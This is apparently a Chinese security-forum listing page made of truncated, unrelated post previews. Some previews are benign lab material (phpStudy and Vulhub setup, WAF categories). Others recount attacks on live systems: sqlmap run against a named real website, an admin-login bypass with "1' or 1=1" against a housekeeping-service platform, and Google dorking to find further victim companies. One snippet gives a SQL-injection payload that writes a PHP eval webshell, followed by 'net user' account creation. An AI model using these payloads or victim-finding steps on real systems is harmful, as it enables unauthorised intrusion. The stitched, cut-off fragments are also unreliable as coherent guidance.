金币呢

环境搭建1、将phpstudy设置为系统服务2、打开管理工具中的服务，进入Apache界面，进行用户设置。记得将phpstudy/apache/logs进行用户权限设置。再来查看phpstudy中网站地址。http://192.168.211.130/phpMyAdmin-4.8.1/本地环境搭建完成。Msf提权1、打开msfconsole2、打开phpmyadmin模块，选用第3个攻击模块（

4444text

也是穷了，缺金币。不小心给魔术师老师打赏了100金币，我哭。。。。然后就想找点漏洞，赚点金币。发现社区挖不动，就跑去官网看看。发现官网页面，看着真的像是有注入。我于是在后面加了id=13,发现改变传参数，页面也会跟着跳转，id=12我偷懒，就用sqlmap跑了一下https://www.zkaq.cn/news/34.html?id=13发现是PHP 7.0.33SQLite数据库但

某家政云系统post注入（万能密码）1、打开后台http://www.······.com/worker.php直接输入1’ or 1=1 — qwe点击回车。他就居然进去了。他就进去了。。就进去了。。。是我没想到的然后敏感信息泄露知道账号密码2 、利用谷歌语法信息搜集后台登录界面，找到同样使用这个系统的公司3 、发现另外一家公司，登录成功4 、返回主页，发现有一个VIP登录，点进

WAF可分为许多种，从产品形态上来划分，可以大致分为三类：1、硬件设备类 目前安全市场上，大多数的 WAF都属于此类。它们以一个独立的硬件设备的形态存在，支持以多种方式（如透明桥接模式、旁路模式、反向代理等）部署到网络中为后端的Web应用提供安全防护。相对于软件产品类的WAF，这类产品的优点是性能好、功能全面、支持多种模式部署等，但它的价格通常比较贵。国内的绿盟、安恒、启明星辰等厂商生产的W

1、通过sql注入，写入一句话木马id=7 union select 1,'<?php eval($_REQUEST[8])?>' into outfile 'c:/phpstudy/www/125.php'函数（相当于数据库备份）：into outfile、into dumpfile2、菜刀、蚁剑连接cmd基本命令net user 账号 密码 /add (新建账号密码）net

我们都知道，在学习网络安全的过程中，搭建漏洞靶场有着至关重要的作用。复现各种漏洞，能更好的理解漏洞产生的原因，提高自己的学习能力。下面我在kali中演示如何详细安装漏洞靶场Vulhub。1、什么是Vulhub？Vulhub是一个基于docker和docker-compose的漏洞环境集合，进入对应目录并执行一条语句即可启动一个全新的漏洞环境，让漏洞复现变得更加简单，让安全研究者更加专注于漏洞原理